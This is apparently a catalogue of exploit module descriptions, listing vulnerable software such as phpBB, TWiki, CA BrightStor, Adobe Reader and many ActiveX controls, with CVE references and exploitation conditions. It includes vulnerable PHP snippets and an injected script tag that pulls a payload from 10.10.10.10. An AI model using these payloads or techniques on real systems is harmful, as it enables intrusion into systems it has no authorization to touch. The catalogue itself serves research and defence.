BASE base_qry_common Remote File Include.
This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier.
CVE-2006-2685
OSVDB-49366
BID-18298
Cacti graph_view.php Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to 0.8.6-d are vulnerable.
OSVDB-17539
BID-14042
Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution
This module exploits a vulnerability in the picEditor.php script of Coppermine Photo Gallery. When configured to use the ImageMagick library, the 'quality', 'angle', and 'clipval' parameters are not properly escaped before being passed to the PHP 'exec' command. In order to reach the vulnerable 'exec' call, the input must pass several validation steps. The vulnerabilities actually reside in the following functions: image_processor.php: rotate_image(...) include/imageObjectIM.class.php: imageObject::cropImage(...) include/imageObjectIM.class.php: imageObject::rotateImage(...) include/imageObjectIM.class.php: imageObject::resizeImage(...) include/picmgmt.inc.php: resize_image(...) NOTE: Use of the ImageMagick library is a non-default option. However, a user can specify its use at installation time.
CVE-2008-0506
OSVDB-41676
http://www.exploit-db.com/exp...
http://forum.coppermine-galle...
Dogfood CRM spell.php Remote Command Execution
This module exploits a previously unpublished vulnerability in the Dogfood CRM mail function which is vulnerable to command injection in the spell check feature. Because of character restrictions, this exploit works best with the double-reverse telnet payload. This vulnerability was discovered by LSO and affects v2.0.10.
OSVDB-54707
http://downloads.sourceforge....
Google Appliance ProxyStyleSheet Command Execution
This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work.
CVE-2005-3757
OSVDB-20981
BID-15509
Matt Wright guestbook.pl Arbitrary Command Execution
The Matt Wright guestbook.pl <= v2.3.1 CGI script contains a flaw that may allow arbitrary command execution. The vulnerability requires that HTML posting is enabled in the guestbook.pl script, and that the web server must have the Server-Side Include (SSI) script handler enabled for the '.html' file type. By combining the script weakness with non-default server configuration, it is possible to exploit this vulnerability successfully.
CVE-1999-1053
OSVDB-84
BID-776
Joomla 1.5.12 TinyBrowser File Upload Code Execution
This module exploits a vulnerability in the TinyMCE/tinybrowser plugin. This plugin is not secured in version 1.5.12 of joomla and allows the upload of files on the remote server. By renaming the uploaded file this vulnerability can be used to upload/execute code on the affected system.
OSVDB-64578
http://milw0rm.com/exploits/9296
http://developer.joomla.org/s...
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.
This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier.
CVE-2008-2905
OSVDB-46173
BID-29716
Nagios3 statuswml.cgi Ping Command Execution
This module abuses a metacharacter injection vulnerability in the Nagios3 statuswml.cgi script. This flaw is triggered when shell metacharacters are present in the parameters to the ping and traceroute commands.
CVE-2009-2288
OSVDB-55281
HP Openview connectedNodes.ovpl Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen.
CVE-2005-2773
OSVDB-19057
BID-14662
OpenX banner-edit.php File Upload PHP Code Execution
This module exploits a vulnerability in the OpenX advertising software. In versions prior to version 2.8.2, authenticated users can upload files with arbitrary extensions to be used as banner creative content. By uploading a file with a PHP extension, an attacker can execute arbitrary PHP code. NOTE: The file must also return either "png", "gif", or "jpeg" as its image type as returned from the PHP getimagesize() function.
CVE-2009-4098
OSVDB-60499
BID-37110
http://archives.neohapsis.com...
https://developer.openx.org/j...
http://www.openx.org/docs/2.8...
http://php.net/manual/en/func...
http://gynvael.coldwind.pl/?i...
http://gynvael.coldwind.pl/?i...
http://gynvael.coldwind.pl/?i...
http://programming.arantius.c...
http://stackoverflow.com/ques...
osCommerce 2.2 Arbitrary PHP Code Execution
osCommerce is a popular open source E-Commerce application. The admin console contains a file management utility that allows administrators to upload, download, and edit files. This could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.
OSVDB-60018
http://www.milw0rm.com/exploi...
PAJAX Remote Command Execution
RedTeam has identified two security flaws in PAJAX (<= 0.5.1). It is possible to execute arbitrary PHP code from unchecked user input. Additionally, it is possible to include arbitrary files on the server ending in ".class.php".
CVE-2006-1551
OSVDB-24618
BID-17519
http://www.redteam-pentesting...
Generic PHP Code eval
Exploits things like <?php eval($_REQUEST['evalme']); ?> It is likely that HTTP evasion options will break this exploit.
PHP Remote File Include Generic Exploit
This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: <?php include($_GET['path']); ?>
vBulletin misc.php Template Name Arbitrary Code Execution
This module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.
CVE-2005-0511
BID-12622
OSVDB-14047
WordPress cache_lastpostdate Arbitrary Code Execution
This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software. This vulnerability is only present when the PHP 'register_globals' option is enabled (common for hosting providers). All versions of WordPress prior to 1.5.1.3 are affected.
CVE-2005-2612
OSVDB-18672
BID-14533
PHP XML-RPC Arbitrary Code Execution
This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.
CVE-2005-1921
OSVDB-17793
BID-14088
phpBB viewtopic.php Arbitrary Code Execution
This module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via preg_replace(). This vulnerability was introduced in revision 3076, and finally fixed in revision 5166. According to the "tags" within their tree, this corresponds to versions 2.0.4 through 2.0.15 (inclusive).
CVE-2005-2086
CVE-2004-1315
OSVDB-11719
OSVDB-17613
BID-14086
BID-10701
PhpMyAdmin Config File Code Injection
This module exploits a vulnerability in PhpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. The file where our payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation.
CVE-2009-1151
OSVDB-53076
http://www.milw0rm.com/exploi...
http://www.phpmyadmin.net/hom...
http://labs.neohapsis.com/200...
QuickTime Streaming Server parse_xml.cgi Remote Execution
The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allow arbitrary commands to be executed as root.
OSVDB-10562
BID-6954
CVE-2003-0050
Simple PHP Blog <= 0.4.0 Remote Command Execution
This module combines three separate issues within The Simple PHP Blog (<= 0.4.0) application to upload arbitrary data and thus execute a shell. The first vulnerability exposes the hash file (password.txt) to unauthenticated users. The second vulnerability lies within the image upload system provided to logged-in users; there is no image validation function in the blogger to prevent an authenticated user from uploading any file type. The third vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted.
CVE-2005-2733
OSVDB-19012
BID-14667
http://www.milw0rm.com/exploi...
SquirrelMail PGP Plugin command execution (SMTP)
This module exploits a command execution vulnerability in the PGP plugin of SquirrelMail. This flaw was found while quickly grepping the code after release of some information at http://www.wslabi.com/. Later, iDefense published an advisory .... Reading an email in SquirrelMail with the PGP plugin activated is enough to compromise the underlying server. Only "cmd/unix/generic" payloads were tested.
CVE-2003-0990
OSVDB-3178
http://lists.immunitysec.com/...
http://labs.idefense.com/inte...
http://www.wslabi.com/wabisab...
TikiWiki tiki-graph_formula Remote PHP Code Execution
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.
CVE-2007-5423
OSVDB-40478
BID-26006
TikiWiki jhot Remote Command Execution
TikiWiki contains a flaw that may allow a malicious user to execute arbitrary PHP code. The issue is triggered due to the jhot.php script not correctly verifying uploaded files. It is possible that the flaw may allow arbitrary PHP code execution by uploading a malicious PHP script resulting in a loss of integrity. The vulnerability was reported in Tikiwiki version 1.9.4.
CVE-2006-4602
OSVDB-28456
BID-19819
http://secunia.com/advisories...
TWiki History TWikiUsers rev Parameter Command Execution
This module exploits a vulnerability in the history component of TWiki. By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers script, an attacker can execute arbitrary OS commands.
CVE-2005-2877
OSVDB-19403
BID-14834
http://twiki.org/cgi-bin/view...
TWiki Search Function Arbitrary Command Execution
This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands.
CVE-2004-1037
OSVDB-11714
BID-11674
http://twiki.org/cgi-bin/view...
Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
This module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe. When an attacker sends a specially crafted alert, arbitrary code may be executed.
CVE-2009-1430
OSVDB-54159
BID-34674
Symantec Remote Management Buffer Overflow
This module exploits a stack buffer overflow in Symantec Client Security 3.0.x. This module has only been tested against Symantec Client Security 3.0.2 build 10.0.2.2000.
CVE-2006-2630
OSVDB-25846
BID-18107
http://research.eeye.com/html...
Trend Micro ServerProtect 5.58 Buffer Overflow
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-1070
OSVDB-33042
BID-22639
Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-2508
OSVDB-35790
BID-23868
Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060 EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-2508
OSVDB-35789
BID-23866
Arkeia Backup Client Type 77 Overflow (Win32)
This module exploits a stack buffer overflow in the Arkeia backup client for the Windows platform. This vulnerability affects all versions up to and including 5.3.3.
CVE-2005-0491
OSVDB-14011
BID-12594
http://lists.netsys.com/piper...
Energizer DUO Trojan Code Execution
This module will execute an arbitrary payload against any system infected with the Arugizer trojan horse. This backdoor was shipped with the software package accompanying the Energizer Duo USB battery charger.
CVE-2010-0103
OSVDB-62782
US-CERT-VU-154421
Veritas Backup Exec Name Service Overflow
This module exploits a vulnerability in the Veritas Backup Exec Agent Browser service. This vulnerability occurs when a recv() call has a length value too long for the destination stack buffer. By sending an agent name value of 63 bytes or more, we can overwrite the return address of the recv function. Since we only have ~60 bytes of contiguous space for shellcode, a tiny findsock payload is sent which uses a hardcoded IAT address for the recv() function. This payload will then roll the stack back to the beginning of the page, recv() the real shellcode into it, and jump to it. This module has been tested against Veritas 9.1 SP0, 9.1 SP1, and 8.6.
CVE-2004-1172
OSVDB-12418
BID-11974
http://www.idefense.com/appli...
Veritas Backup Exec Windows Remote Agent Overflow
This module exploits a stack buffer overflow in the Veritas BackupExec Windows Agent software. This vulnerability occurs when a client authentication request is received with type '3' and a long password argument. Reliable execution is obtained by abusing the stack buffer overflow to smash a SEH pointer.
CVE-2005-0773
OSVDB-17624
BID-14022
http://www.idefense.com/appli...
http://seer.support.veritas.c...
Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
This module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884). By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need set the hostname argument (HNAME).
BID-31684
OSVDB-49468
CVE-2008-4397
http://crackinglandia.blogspo...
CA BrightStor Discovery Service TCP Overflow
This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic[at]gmx.net and affects all known versions of the BrightStor product. This module is based on the 'cabrightstor_disco' exploit by Thor Doomen.
CVE-2005-2535
OSVDB-13814
BID-12536
http://archives.neohapsis.com...
http://milw0rm.com/exploits/1131
CA BrightStor Discovery Service Stack Buffer Overflow
This module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a large request is sent to UDP port 41524, triggering a stack buffer overflow.
CVE-2005-0260
OSVDB-13613
BID-12491
http://www.idefense.com/appli...
Computer Associates Alert Notification Buffer Overflow
This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1 By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.
CVE-2007-4620
OSVDB-44040
BID-28605
CA BrightStor HSM Buffer Overflow
This module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-5082
OSVDB-41363
BID-25823
CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-0449
OSVDB-31593
BID-22342
CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-5003
OSVDB-41353
BID-24348
CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-3216
OSVDB-35329
BID-24348
CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0. By sending a specially crafted request to the lic98rmtd.exe service, an attacker could overflow the buffer and execute arbitrary code.
CVE-2005-0581
OSVDB-14389
BID-12705
CA BrightStor ArcServe Media Service Stack Buffer Overflow
This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA BrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker can overflow a stack buffer and execute arbitrary code.
CVE-2007-2139
OSVDB-35326
BID-23635
https://www.zerodayinitiative...
CA BrightStor ARCserve Message Engine Buffer Overflow
This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2007-0169
OSVDB-31318
BID-22005
CA BrightStor ARCserve Message Engine Heap Overflow
This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup 11.5. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2006-5143
OSVDB-29533
BID-20365
CA BrightStor Agent for Microsoft SQL Overflow
This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net.
CVE-2005-1272
OSVDB-18501
BID-14453
http://www.idefense.com/appli...
http://www3.ca.com/securityad...
CA BrightStor ARCserve Tape Engine Buffer Overflow
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code.
CVE-2006-6076
OSVDB-30637
BID-21221
http://www.milw0rm.com/exploi...
http://www.ca.com/us/security...
CA BrightStor Universal Agent Overflow
This module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address.
CVE-2005-1018
OSVDB-15471
BID-13102
http://www.idefense.com/appli...
Adobe Flash Player "newfunction" Invalid Pointer Use
This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.
CVE-2010-1297
OSVDB-65141
BID-40586
http://www.adobe.com/support/...
http://feliam.wordpress.com/2...
Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
CVE-2009-3459
BID-36600
OSVDB-58729
http://blogs.adobe.com/psirt/...
http://www.adobe.com/support/...
http://www.fortiguard.com/ana...
Adobe Collab.getIcon() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
CVE-2009-0927
OSVDB-53647
http://www.zerodayinitiative....
Adobe JBIG2Decode Memory Corruption Exploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.
CVE-2009-0658
OSVDB-52073
http://bl4cksecurity.blogspot...
Adobe Doc.media.newPlayer Use After Free Vulnerability
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.
CVE-2009-4324
BID-37331
OSVDB-60980
Adobe util.printf() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.
CVE-2008-2992
OSVDB-49520
AOL Instant Messenger goaway Overflow
This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying a overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5.
CVE-2004-0636
OSVDB-8398
BID-10889
http://www.idefense.com/appli...
Amaya Browser v11.0 bdo tag overflow
This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the "bdo" tag, an attacker may be able to execute arbitrary code.
CVE-2009-0323
OSVDB-55721
BID-33046, 33047
AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow
This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website. By setting an overly long value to 'ConvertFile()', an attacker can overrun a buffer and execute arbitrary code.
OSVDB-54706
BID-35028
http://www.milw0rm.com/exploi...
America Online ICQ ActiveX Control Arbitrary File Download and Execute.
This module allows remote attackers to download and execute arbitrary files on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.
CVE-2006-5650
OSVDB-30220
BID-20930
http://www.zerodayinitiative....
Apple ITunes 4.7 Playlist Buffer Overflow
This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.
CVE-2005-0043
OSVDB-12833
BID-12238
Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. The Browser target for this module was tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin.
CVE-2007-0015
OSVDB-31023
BID-21829
http://projects.info-pull.com...
Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. An attacker may be able to excute arbitrary code by sending an overly long string to the "ShortFormat()" method in askbar.dll.
CVE-2007-5107
OSVDB-37735
http://wslabi.com/wabisabilab...
AtHocGov IWSAlerts ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll (6.1.4.36) an attacker may be able to execute arbitrary code. This vulnerability was silently patched by the vendor.
http://www.athoc.com/products...
Autodesk IDrop ActiveX Control Heap Memory Corruption
This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties.
OSVDB-53265
BID-34352
http://www.milw0rm.com/exploi...
http://marc.info/?l=full-disc...
AwingSoft Winds3D Player SceneURL Buffer Overflow
This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.
CVE-2009-4588
OSVDB-60017
http://www.milw0rm.com/exploi...
http://www.shinnai.net/exploi...
http://www.rec-sec.com/2009/0...
AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
This module exploits an untrusted program execution vulnerability within the Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL' parameter to the URL to an executable, an attacker can execute arbitrary code. Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and IE 8 on Windows XP SP3.
CVE-2009-4850
OSVDB-60049
BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX control. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method "OnBeforeVideoDownload" an attacker can execute arbitrary code.
CVE-2009-1612
OSVDB-54169
BID-34789
http://www.exploit-db.com/exp...
RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in RKD Software Barcode Application ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.
http://www.milw0rm.com/exploi...
OSVDB-37482
BID-24596
CVE-2007-3435
CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker could overflow a buffer and execute arbitrary code on the system.
CVE-2008-1472
OSVDB-43214
Chilkat Crypt ActiveX WriteFile Unsafe Method
This module allows attackers to execute code via the 'WriteFile' unsafe method of Chilkat Software Inc's Crypt ActiveX control. This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to execute our payload immediately. However, this method requires that the victim user be browsing with Administrator. Additionally, this method will not work on newer versions of Windows. NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.
CVE-2008-5002
OSVDB-49510
BID-32073
http://www.exploit-db.com/exp...
CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll ActiveX Control provided by CommuniCrypt Mail 1.16. By sending a overly long string to the "AddAttachments()" method, an attacker may be able to execute arbitrary code.
OSVDB-64839
http://www.exploit-db.com/exp...
Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code.
CVE-2008-0955
OSVDB-45655
Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to local files!
CVE-2009-2011
BID-35273
OSVDB-54969
http://www.exploit-db.com/exp...
http://dxstudio.com/guide.aspx
Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.
CVE-2007-4466
OSVDB-37723
FlipViewer FViewerLoading ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0. The vulnerability is caused due to a boundary error in the FViewerLoading (FlipViewerX.dll) ActiveX control when handling the "LoadOpf()" method.
CVE-2007-2919
OSVDB-37042
BID-24328
EnjoySAP SAP GUI ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending an overly long string to the "PrepareToPostHTML()" method, an attacker may be able to execute arbitrary code.
CVE-2007-3605
OSVDB-37690
BID-24772
Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the "ExtractIptc()" property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.
CVE-2008-5711
OSVDB-41073
BID-27534
http://milw0rm.com/exploits/5049
GOM Player ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499. By sending an overly long string to the "OpenUrl()" method located in the GomWeb3.dll Control, an attacker may be able to execute arbitrary code.
CVE-2007-5779
OSVDB-38282
http://secunia.com/advisories...
Green Dam URL Processing Buffer Overflow
This module exploits a stack-based buffer overflow in Green Dam Youth Escort version 3.17 in the way it handles overly long URLs. By setting an overly long URL, an attacker can overrun a buffer and execute arbitrary code. This module uses the .NET DLL memory technique by Alexander Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.
OSVDB-55126
http://www.cse.umich.edu/~jha...
http://www.milw0rm.com/exploi...
http://taossa.com/archive/bh0...
Persits XUpload ActiveX AddFile Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code.
CVE-2008-0492
OSVDB-40762
BID-27456
http://www.milw0rm.com/exploi...
http://lists.grok.org.uk/pipe...
HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. By passing an overly long string to the AddFolder method, an attacker may be able to execute arbitrary code.
CVE-2007-6530
OSVDB-39901
BID-27025
http://lists.grok.org.uk/pipe...
HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code.
CVE-2007-1819
OSVDB-34317
BID-23239
http://labs.idefense.com/inte...
Hyleos ChemView ActiveX Control Stack Buffer Overflow
This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods with an overly long first argument, an attacker can overrun a buffer and execute arbitrary code.
CVE-2010-0679
OSVDB-62276
http://www.security-assessmen...
http://www.exploit-db.com/exp...
IBM Access Support ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in IBM Access Support. When sending an overly long string to the GetXMLValue() method of IbmEgath.dll (3.20.284.0) an attacker may be able to execute arbitrary code.
CVE-2009-0215
OSVDB-52958
BID-34228
IBM Lotus Domino Web Access Upload Module Buffer Overflow
This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module. By sending an overly long string to the "General_ServerName()" property located in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute arbitrary code.
CVE-2007-4474
OSVDB-40954
BID-26972
http://milw0rm.com/exploits/4820
Internet Explorer COM CreateObject Code Execution
This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.
MSB-MS06-014
CVE-2006-0003
OSVDB-24517
MSB-MS06-073
CVE-2006-4704
OSVDB-30155
Internet Explorer isComponentInstalled Overflow
This module exploits a stack buffer overflow in Internet Explorer. This bug was patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
CVE-2006-1016
OSVDB-31647
BID-16870
Internet Explorer Unsafe Scripting Misconfiguration
This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to interact with the file system and run commands. This security flaw is not uncommon in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to save binary data to the file system, ADODB.Stream access is required, which in IE7 will trigger a cross domain access violation. As such, we write the code to a .vbs file and execute it from there, where no such restrictions exist. When set via domain policy, the most common registry entry to modify is HKLM\ Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, which if set to '0' forces ActiveX controls not marked safe for scripting to be enabled for the Intranet zone. This module creates a javascript/html hybrid that will render correctly either via a direct GET http://msf-server/ or as a javascript include, such as in: http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js> </script>.
http://support.microsoft.com/...
http://blog.invisibledenizen....
Sun Java Web Start Plugin Command Line Argument Injection
